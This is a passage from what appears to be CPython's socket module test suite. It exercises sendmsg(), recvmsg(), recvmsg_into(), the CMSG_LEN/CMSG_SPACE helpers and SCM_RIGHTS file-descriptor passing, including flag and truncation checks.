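        # returned by recvmsg() so the shared tests can treat both alike.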
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except TimeoutError:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("TimeoutError not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(TimeoutError,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
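# Purely illustrative sketch (not used by any test below): the usual recipe
# for sizing a recvmsg() ancillary-data buffer meant to hold up to `maxfds`
# file descriptors, built from the same CMSG_SPACE()/array assumptions
# checked above. Only meaningful on platforms providing socket.CMSG_SPACE().
def _example_scm_rights_bufsize(maxfds):
    # Each descriptor travels as a C int; CMSG_SPACE() adds the cmsghdr
    # header plus alignment padding on top of the raw payload size.
    return socket.CMSG_SPACE(maxfds * array.array("i").itemsize)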
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
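    # Note: MSG_CTRUNC is the flag set in the recvmsg() result when the
    # kernel had to discard or truncate control (ancillary) data because
    # the supplied ancillary buffer was too small; the checkFlags() calls
    # use checkset/checkunset to assert whether that truncation occurred.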
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
